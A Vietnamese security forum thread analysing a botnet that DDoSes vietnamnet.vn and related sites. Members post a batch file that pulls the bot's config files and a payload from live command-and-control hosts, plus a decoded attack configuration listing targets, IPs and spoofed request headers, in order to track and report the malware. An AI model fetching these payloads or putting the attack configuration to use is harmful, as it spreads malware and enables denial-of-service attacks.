Con đang DDOS Vietnamnet chính là iTunesHelper.exe đấy anh PXMMRF. Các tấm hình em vừa post chính là minh hoạ quá trình debug con này. Nó đang download index.txt từ http://wide.ircop.cn/index.txt?113, giãi mã ra bằng unzip trên memory và CAST256, sau đó nó dùng thư viện libcurl (thư viện core của chương trình curl) để parse và tấn công crawler theo dạng các tool download nguyên website về đấy anh ! 2 1visao: Lại hình như là của stl rồi 1visao. Làm sao mà tụi nó mạo danh nguyên một gói phần mềm của Intel được ???? File của Intel mắc mớ gì lại dùng thư viện CryptoPP làm chi. Cậu up giùm tui các file .dll sau: 1. IAStorCommon.dll 2. IAStorUIHelper.dll 3. IAStorDataMgr.dll 4. SmartPin.dll 5. SysInftLib.dll Nếu quả là của stl thì em chỉ biết chửi nữa chứ làm gì, lan tràn quá rồi. 
Ừ tôi đã xác định 100% chính iTunesHelper.exe là STL DDoS tool từ sớm hôm qua rồi mà, ngay khi mà 1visao upload file iTunes lên mang. Cả chiều và đêm hôm qua tôi thử nghiệm DDoS tool này trên thưc tế và có một đống dữ liệu, kể cả những master webserver nghi ngờ, như tôi đã viết (trang 23, topic này). Ý tôi hỏi là sợ 1visao lại tìm ra một con Trojan khác DDoS vào vietnamnet.vn, thay vì con iTunesHelper.exe, vì con này ta đã biết rõ rồi. Tôi cũng đã đoc kỹ các bài viết của TQN về khía canh liên quan, mà tôi cũng đang thắc mắc là con gì download iTunesHelper.exe về máy nạn nhân và download từ đâu (Các bài viết này ngay sau bài viết của tôi. Bài viết của tôi đã khẳng định 100% iTunesHelper.exe là DDoS tool, tấn công vào toàn bộ kết cấu hạ tầng mạng của vietnamnet.net) ]]>
/hvaonline/posts/list/39641.html#245924 /hvaonline/posts/list/39641.html#245924 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245925 /hvaonline/posts/list/39641.html#245925 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245926 /hvaonline/posts/list/39641.html#245926 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245928 /hvaonline/posts/list/39641.html#245928 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?wv13bdoc4g8f905 Bà con phụ một tay up mẫu cho AVs nhé. Giờ em đi ăn sáng, uống cafe lấy sức đã, tối qua thức tới 3h. Ngày nay lại ngồi lỳ ở nhà nữa rồi, cúp đt thôi. À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé !]]> /hvaonline/posts/list/39641.html#245929 /hvaonline/posts/list/39641.html#245929 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245931 /hvaonline/posts/list/39641.html#245931 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245933 /hvaonline/posts/list/39641.html#245933 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

phuongnvt wrote:
bác cứ làm tốt cái vụ này cho xong đi, xong rồi bà con tặng bác 1 con laptop mới :D :D :D :D :D ah mà nếu ko có thì liên hệ tui, tui cho thuê laptop giá rẻ 1 ngày 1 chai ken và 1 ổ bánh mì là được rồi!!!!!!!!!! :D  
Thế có bác nào ở vietnamnet.vn đang vào đây xem thì lên tiếng xem nào. Thanks. Nếu không là tôi kiểm tra đấy nhé. Hì hì. Giỡn chơi thôi!]]>
/hvaonline/posts/list/39641.html#245938 /hvaonline/posts/list/39641.html#245938 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245939 /hvaonline/posts/list/39641.html#245939 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245941 /hvaonline/posts/list/39641.html#245941 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause
Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi. Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy. ]]>
/hvaonline/posts/list/39641.html#245942 /hvaonline/posts/list/39641.html#245942 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

cadaochoem wrote:
Bác TQN cứ ra Phong Vũ, coi cái nào hợp nhãn hợp giá tiền. Chấm nó rồi thì việc tiếp theo là lật mặt sau nó lên, thấy địa chỉ phân phối chính hãng hoặc đại lý chính thức (Viễn Sơn thuộc Asus chẳng hạn) rồi đến đó mà mua, giá rẻ nhất, thay thế linh kiện thoải mái. Em toàn làm vậy, tiết kiệm được cả triệu bạc  
Hì, mình cũng vậy :) . 1visao kiếm tất cả các file sau trong máy tính bị nhiễm virus của STL đó và upload cho mình nhé ;) : "IAStorCommon.dll", "IAStorUIHelper.dll", "IAStorDataMgr.dll", "SmartPin.dll", "SysInftLib.dll" Update: Sorry, mình vừa mới thấy bạn 1visao đã gửi những file trên cho anh TQN rồi.]]>
/hvaonline/posts/list/39641.html#245944 /hvaonline/posts/list/39641.html#245944 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái. Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause
Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi. Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.  
Tạo 1 team nhỏ code những tools nhỏ cần thiết hỗ trợ RCE đi anh :D Ví dụ 1 số tools tự động kiểm tra thường xuyên những link down "mèo què" và tự động detect nếu nó đã bị thay đổi. Những tool như vậy sẽ có ích và giúp tiết kiệm được nhiều thời gian. @Các bạn coder nào rảnh hay không biết phải làm gì thì cùng 1 tay góp sức đi ^^...]]>
/hvaonline/posts/list/39641.html#245945 /hvaonline/posts/list/39641.html#245945 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip,deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Keep-Alive: 115;//HEA+Connection: keep-alive;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:5.0) Gecko/20100101 Firefox/5.0;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip, deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Cache-Control: max-age=0;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Language: en-us,en;q=0.5;//HEA+Accept-Encoding: gzip,deflate;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+Connection: close;//HEA+Referer: <i95I6m2s0k=>;//HEA+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30;//HEA+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;//HEA+Accept-Encoding: gzip,deflate,sdch;//HEA+Accept-Language: en-US,en;q=0.8;//HEA+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;//HEA+Accept-Language: en-US;//HEA+Accept-Encoding: gzip, deflate;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Connection: close;//\;/\
UAC+80;//HEA+User-Agent: Opera/9.80 (Windows NT 5.1; U; en) Presto/2.7.62 Version/11.01;//HEA+Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1;//HEA+Accept-Language: en-US,en;q=0.9;//HEA+Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1;//HEA+Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0;//HEA+Referer: <i95I6m2s0k=>;//HEA+Cookie: <51hqVbyn5d=>;//HEA+Connection: Keep-Alive, TE;//\;/\
UAC+80;//HEA+Accept: */*;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept-Language: en-us;//HEA+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727);//HEA+Accept-Encoding: gzip, deflate;//HEA+Connection: close;//HEA+Cache-Control: no-cache;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
UAC+80;//HEA+Accept: */*;//HEA+Referer: <i95I6m2s0k=>;//HEA+Accept-Language: en-US;//HEA+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729);//HEA+Accept-Encoding: gzip, deflate;//HEA+Connection: Keep-Alive;//HEA+Cookie: <51hqVbyn5d=>;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/;//RET+http://vietnamnet.vn/vn/index.html;//REP+http://vietnamnet.vn/vn/index.html;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+30;//ANT+10;//EST+50;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+1;//FIR+0;//JOP+o;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/;//RET+http://vietnamnet.vn/vn/index.html;//REP+http://vietnamnet.vn/vn/index.html;//LIP+;//RIP+vietnamnet.vn:80:117.103.197.249;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+30;//ANT+10;//EST+60;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+1;//FIR+0;//JOP+o;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+;//RIP+vietnamnet.vn:80:123.30.133.166;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+45;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+DES;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+0;//RAN+0;//CCR+20;//CCK+300;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamnet.vn;//ITS+http://vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+;//RIP+vietnamnet.vn:80:123.30.184.10;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+5;//CON+35;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+0;//ENC+DES;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+0;//RAN+0;//CCR+20;//CCK+300;//FRE+;//FOR+1;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+tuanvietnam.vietnamnet.vn;//ITS+http://tuanvietnam.vietnamnet.vn/;//RET+;//REP+;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+8;//CON+40;//ANT+10;//EST+150;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vef.vn;//ITS+http://vef.vn/;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+8;//CON+30;//ANT+10;//EST+150;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+0;//CRA+0;//BAC+1;//RAN+0;//CCR+20;//CCK+15;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+a;//JIN+325;//JAX+350;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+m.vietnamnet.vn;//ITS+http://m.vietnamnet.vn/vn/index.html;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//VER+;//THE+3;//CON+30;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+5;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+0;//CRA+0;//BAC+1;//RAN+0;//CCR+30;//CCK+20;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+1;//KAT+;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+vietnamweek.net;//ITS+http://vietnamweek.net/;//RET+;//REP+;//LIP+1;//RIP+;//PRT+80;//PRP+1;//PRD+;//PP2+;//PD2+;//VER+;//THE+3;//CON+35;//ANT+10;//EST+120;//MSP+;//MRP+;//LSL+;//LST+;//NOD+;//FOL+1;//FOM+2;//REF+1;//IGN+;//ENC+;//SLE+1;//CRF+1;//CRL+1;//CRA+1;//BAC+1;//RAN+0;//CCR+20;//CCK+20;//FRE+;//FOR+;//MAX+;//TIM+;//IZE+0;//KAT+;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
PRE+443;//DOM+option.drfound.net;//ITS+http://option.drfound.net/k113.css;//LIP+;//RIP+;//PRT+80;//PRP+;//PRD+;//PP2+;//PD2+;//THE+1;//CON+100;//EST+1500;//NOD+1;//FOL+0;//REF+0;//ENC+RSA;//SLE+30;//BAC+0;//RAN+0;//CCR+;//CCK+;//FRE+;//FOR+;//MAX+;//POC+89;//PAT+AppData;//FLE+iTunes.tmp;//SIE+1054208;//JaJ+0;//FIR+0;//JOP+o;//JIN+;//JAX+;//JSI+;//FUN+0;//\;/\
Lần này, sau khi đọc topic này, mấy anh thêm cái http://tuanvietnam.vietnamnet.vn vào danh sách mục tiêu, triệt đường VNN hết à ? Khốn nạn thật, tìm đủ cách để DDOS VNN ngay cả khi đã bị vạch trần, phanh phui. Các cơ quan chức năng của Vietnam ta đâu rồi, nhắm mắt làm ngơ hết rồi à, nhận được lệnh rồi à ?]]>
/hvaonline/posts/list/39641.html#245946 /hvaonline/posts/list/39641.html#245946 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245949 /hvaonline/posts/list/39641.html#245949 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

mrquytk93 wrote:
Sau vài lần lướt web thì thấy topic này có vẻ rất " HOT " Chuyển sang chủ để chính luôn, là HVA có biện pháp gì mới để chống hay không Chứ phân tích cái này rồi cuối cùng vẫn bị DIE thì hơi chán Khoảng đầu tháng 9 mình muốn HVA nghiên cứu sâu hơn về synflood Vì hiện tại với synflood mình có thể cho HVA die bất cứ lúc nào ------------------------------------------------------------------------- Mr.Quy CBG.No1 ADMIN - ATH  
Bồ này hay nhỉ khẳng định như thế và tự tin vào khả năng của mình quá nhé. .HI Anh TQN Hiện nay một số server đặt tại FPT nhiễm con SbieMgsdfsdfsdfm.dll , SbieSvdsfsdfc.exe e nghĩ hai con này giống như anh đã phân tích. Nó cũng DDOS tới Vietnamnet. 2 con này nó nằm trong Program file và folder có tên là Sandboxie. Mấy admin nào dùng 2k3, 2k8 xem thử có không nhá.]]>
/hvaonline/posts/list/39641.html#245951 /hvaonline/posts/list/39641.html#245951 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245952 /hvaonline/posts/list/39641.html#245952 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245953 /hvaonline/posts/list/39641.html#245953 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái. Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause
Đoạn bat này sẽ download các file trên về. Sau đó các bạn tạo thêm 1 thư mục chứa ngày tháng mà các bạn down các file trên về, vd: 26_08_2011, chép các file đã download được vào đó. Định kỳ compare một lần, nếu có thấy thay đổi nội dung một trong các file thì báo lên cho bà con biết giùm, còn giống hết thì xoá đi. Cảm ơn bà con tham gia giúp theo dõi. Một mình em cứ chạy tracker 1 đống luôn, compare nữa thì mệt quá, code tool tự động thì lười, thôi thì chịu khó bat file vậy.  
Hi TQN, Chỉ trong vòng 1h vừa qua đã có sự thay đổi trong file pref.firebay.cn_index.txt link: lúc 14h30: http://www.mediafire.com/?lq1cuttlt7etb2n lúc 15h30: http://www.mediafire.com/?724ayc0ic5xa8c1 ]]>
/hvaonline/posts/list/39641.html#245954 /hvaonline/posts/list/39641.html#245954 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245967 /hvaonline/posts/list/39641.html#245967 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

v74 wrote:
con số hoạt động biến hoá nếu làm theo cách của admin thì quá dể nhưng không biết một lần tiêu diệt hết không hay để lại tàn dư ....ập vào thì ta kéo ra..một lần hay một cái thi có trời mới biết 
Không có chuyện chỉ có "trời" mới biết đâu bạn :-) . Quan trọng nhất là có phát hiện ra máy tính hay mạng của mình đã và đang bị tấn công hoặc khai thác hay không thôi. Còn khi đã phát hiện rồi mà không khắc phục được thì hoặc là trình độ non kém, hoặc là lười nhác và vô trách nhiệm với bản thân và xã hội.]]>
/hvaonline/posts/list/39641.html#245969 /hvaonline/posts/list/39641.html#245969 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé ! 
Bác vào đây tự build cấu hình hết theo ý mình : http://thinkpadstyle.com/]]>
/hvaonline/posts/list/39641.html#245972 /hvaonline/posts/list/39641.html#245972 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245973 /hvaonline/posts/list/39641.html#245973 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245976 /hvaonline/posts/list/39641.html#245976 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245982 /hvaonline/posts/list/39641.html#245982 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245984 /hvaonline/posts/list/39641.html#245984 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC wrote:
2 TQN, Tôi có thể sử dụng blogspot của a để post cảnh báo về tiến trình ddos này được không vậy? Có 1 số bạn bè họ không thể truy cập được hvaonline.net (hầu hết đều làm việc tại các cao ốc trong Q1). Tôi không hiểu là do firewall của admin chặn hay lý do gì khác (tôi ở ngoài quán cafe thì lại ok). Mong a trả lời sớm vì họ khá quan tâm vấn đề này và vietnamnet.vn - vietnamweek là các trang ưu tiên khi bootup.  
Anh phải bảo họ từ trang chủ vào forum HVAOnline, rồi mới copy link anh gửi vào trình duyệt thì họ mới xem được nội dung.]]>
/hvaonline/posts/list/39641.html#245985 /hvaonline/posts/list/39641.html#245985 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC wrote:
2 TQN, Tôi có thể sử dụng blogspot của a để post cảnh báo về tiến trình ddos này được không vậy? Có 1 số bạn bè họ không thể truy cập được hvaonline.net (hầu hết đều làm việc tại các cao ốc trong Q1). Tôi không hiểu là do firewall của admin chặn hay lý do gì khác (tôi ở ngoài quán cafe thì lại ok). Mong a trả lời sớm vì họ khá quan tâm vấn đề này và vietnamnet.vn - vietnamweek là các trang ưu tiên khi bootup.  
Chuyện các cao ốc ở Q1 chặn HVA tôi có biết. Một số anh em làm quản trị các hệ thống mạng của một số doanh nghiệp lo sợ rằng, nhân viên sẽ lên HVA tham khảo các thông tin hack hiếc này nọ và làm chuyện khuất tất trên hệ thống mạng của họ. Nhưng cái gì cũng có mặt trái của nó, tuần qua tôi có gặp vài mạng doanh nghiệp có nhiễm bot của STL ( phiên bản lây nhiễm qua Unikey fake )]]>
/hvaonline/posts/list/39641.html#245988 /hvaonline/posts/list/39641.html#245988 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245989 /hvaonline/posts/list/39641.html#245989 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Bà con tạo một thư mục Tracker chẵng hạn, chép đoạn bat file này vào file tracker.bat. Lâu lâu mấy bác buồn buồn không biết làm gì thì Enter nó giùm em một cái. Code:
@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause
 
Em làm theo anh mà thằng avira của em nó nhai mất k113.css rồi. Hic
]]>
/hvaonline/posts/list/39641.html#245990 /hvaonline/posts/list/39641.html#245990 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245992 /hvaonline/posts/list/39641.html#245992 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat wrote:

TMDTHBC wrote:
2 TQN, Tôi có thể sử dụng blogspot của a để post cảnh báo về tiến trình ddos này được không vậy? Có 1 số bạn bè họ không thể truy cập được hvaonline.net (hầu hết đều làm việc tại các cao ốc trong Q1). Tôi không hiểu là do firewall của admin chặn hay lý do gì khác (tôi ở ngoài quán cafe thì lại ok). Mong a trả lời sớm vì họ khá quan tâm vấn đề này và vietnamnet.vn - vietnamweek là các trang ưu tiên khi bootup.  
Chuyện các cao ốc ở Q1 chặn HVA tôi có biết. Một số anh em làm quản trị các hệ thống mạng của một số doanh nghiệp lo sợ rằng, nhân viên sẽ lên HVA tham khảo các thông tin hack hiếc này nọ và làm chuyện khuất tất trên hệ thống mạng của họ. Nhưng cái gì cũng có mặt trái của nó, tuần qua tôi có gặp vài mạng doanh nghiệp có nhiễm bot của STL ( phiên bản lây nhiễm qua Unikey fake ) 
Vâng đúng thế a à, tôi vọoc chơi thì thấy đa phần đều dính con adobe... KIS có bản quyền hẳn hoi nhưng là officer thì ... hehehe sorry không có chuyện update KIS (rất buồn cười-họ có cả 1 room IT 5 người đấy ). Nhưng hậu quả của việc đó là ... phải đi làm "chùa" dùm sếp vì sếp muốn xem IT của họ làm gì ... hehehe tôi bảo đọc hva để biết thì ..... xin lỗi botay.com ( đã "không biết" mà còn đóng cửa dạy nhau thì ...) ]]>
/hvaonline/posts/list/39641.html#245993 /hvaonline/posts/list/39641.html#245993 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245994 /hvaonline/posts/list/39641.html#245994 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#245995 /hvaonline/posts/list/39641.html#245995 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o wrote:
Thấy các anh up mẫu cho mấy hãng antivirus khác mà chưa thấy ai nhắc đến đã gửi cho Avast, thằng này hiện em đang dùng, các mẫu down về quét cứ trơ ra đó ah. Đã gửi mẫu qua mail virus@avast.com mà không thấy nó phản hồi gì hết, lần trước em gửi 1 đống mẫu trên link của anh TQN up cả tuần nay mà chẳng thấy nó phản hồi Chiều em thử send cho nó vài mẫu faceItune nữa, ko biết nó có chịu phân tích và trả lời ko nữa 
Avast chuyên nhận mẫu mà không phản hồi đấy bạn ;) .]]>
/hvaonline/posts/list/39641.html#245996 /hvaonline/posts/list/39641.html#245996 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.
